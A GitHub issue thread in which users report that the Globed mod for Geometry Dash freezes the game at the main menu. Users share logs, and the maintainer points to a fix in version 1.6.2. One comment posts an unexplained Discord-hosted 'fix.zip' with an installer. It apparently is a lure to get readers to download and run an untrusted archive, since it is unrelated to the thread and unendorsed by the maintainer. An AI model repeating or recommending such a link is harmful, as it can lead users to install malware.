### ISSUE TITLE
Game freezes on main menu (windows)

### ISSUE THREAD

**Issue by Justanotherkitty** [GlobedGD/globed2#231]
The game freezes after the main menu loads. I got rid of all my mods and then added them back until it broke again, I only had this(and it's dependencies) and qolmod installed, and removing just globed fixed it.

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by TGP9063** [comment]
this is true when i load gd with the new globed version it crashes my game i delete the binary and then it works pls fix this

**Comment by dankmeme01** [comment]
@TGP9063 do you have a crashlog? please send if you do, otherwise it's hard to tell what's the issue

**Comment by Justanotherkitty** [comment]
> @TGP9063 do you have a crashlog? please upload it if you do, otherwise it's hard to tell what's the issue
at least for me it didn't make a crashlog, sorry :(

**Comment by dankmeme01** [comment]
can you at least upload a regular log of the session then?

it can be found in the `geode/logs` directory in the game folder

**Comment by Justanotherkitty** [comment]
[Geode 2024-09-02 22.12.29.log](https://github.com/user-attachments/files/16849647/Geode.2024-09-02.22.12.29.log)
hope this helps! thankfully at least on my end it seems to have fixed itself lol

**Comment by TGP9063** [comment]
[2024-09-03_12-23-00.log](https://github.com/user-attachments/files/16911481/2024-09-03_12-23-00.log)
this

**Comment by dankmeme01** [comment]
update the mod, this should be fixed in v1.6.2
